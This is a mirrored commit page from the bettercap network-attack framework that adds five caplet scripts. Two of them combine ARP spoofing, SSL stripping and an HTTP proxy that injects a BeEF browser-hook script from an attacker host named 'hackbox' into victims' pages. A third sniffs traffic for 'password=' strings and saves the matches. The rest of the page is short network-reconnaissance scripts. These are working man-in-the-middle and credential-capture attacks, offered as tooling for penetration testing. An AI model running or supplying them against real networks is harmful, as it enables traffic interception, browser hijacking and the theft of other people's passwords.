mirror of
https://github.com/bettercap/bettercap
synced 2025-08-21 05:53:20 -07:00
Fixed compilation
This commit is contained in:
parent
9ede6c1518
commit
f992cb50f2
22 changed files with 100 additions and 29 deletions
5
caplets/active_recon.cap
Normal file
5
caplets/active_recon.cap
Normal file
|
@ -0,0 +1,5 @@
|
|||
net.probe on
|
||||
net.recon on
|
||||
sleep 5
|
||||
net.show
|
||||
quit
|
21
caplets/beef_active.cap
Normal file
21
caplets/beef_active.cap
Normal file
|
@ -0,0 +1,21 @@
|
|||
# spoof everyone as they're discovered
|
||||
# set arp.spoof.targets 192.168.1.0/24
|
||||
# strip down https links when possible
|
||||
set http.proxy.sslstrip true
|
||||
# inject beef hook
|
||||
set http.proxy.post.filter |</head>|<script type="text/javascript" src="http://hackbox:3000/hook.js"></script></head>|
|
||||
|
||||
# keep searching for new targets
|
||||
# net.probe on
|
||||
|
||||
# keep reading arp table for network mapping
|
||||
net.recon on
|
||||
# redirect http traffic to a proxy
|
||||
http.proxy on
|
||||
sleep 5
|
||||
# start arp spoofing attack
|
||||
arp.spoof on
|
||||
|
||||
|
||||
|
||||
|
19
caplets/beef_passive.cap
Normal file
19
caplets/beef_passive.cap
Normal file
|
@ -0,0 +1,19 @@
|
|||
# strip down https links when possible
|
||||
set http.proxy.sslstrip true
|
||||
# inject beef hook
|
||||
set http.proxy.post.filter |</head>|<script type="text/javascript" src="http://hackbox:3000/hook.js"></script></head>|
|
||||
#
|
||||
# keep reading arp table for network mapping
|
||||
net.recon on
|
||||
# redirect http traffic to a proxy
|
||||
http.proxy on
|
||||
|
||||
# wait for everything to start properly
|
||||
sleep 1
|
||||
active
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
4
caplets/passive_recon.cap
Normal file
4
caplets/passive_recon.cap
Normal file
|
@ -0,0 +1,4 @@
|
|||
net.recon on
|
||||
sleep 1
|
||||
net.show
|
||||
quit
|
13
caplets/spoof_n_sniff_passwords.cap
Normal file
13
caplets/spoof_n_sniff_passwords.cap
Normal file
|
@ -0,0 +1,13 @@
|
|||
# keep reading arp table for network mapping
|
||||
net.recon on
|
||||
|
||||
set net.sniffer.regexp .*password=.+
|
||||
set net.sniffer.output passwords.cap
|
||||
|
||||
# start arp spoofing attack
|
||||
# arp.spoof on
|
||||
net.sniffer on
|
||||
|
||||
|
||||
|
||||
|
Loading…
Add table
Add a link
Reference in a new issue